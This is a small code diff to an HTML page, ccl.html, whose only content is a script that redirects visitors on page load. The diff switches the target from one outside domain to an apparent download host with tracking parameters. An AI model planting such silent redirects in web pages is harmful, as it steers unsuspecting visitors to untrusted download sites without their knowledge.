--- a/ccl.html
+++ b/ccl.html
@@ -1,3 +1,3 @@
 <script>
-  window.location.href="https://main.RY872.com/?AgentId=120784181585980099"
+  window.location.href="https://dl.hawcyy.com/?parent=625664&t=1592833494"
 </script>
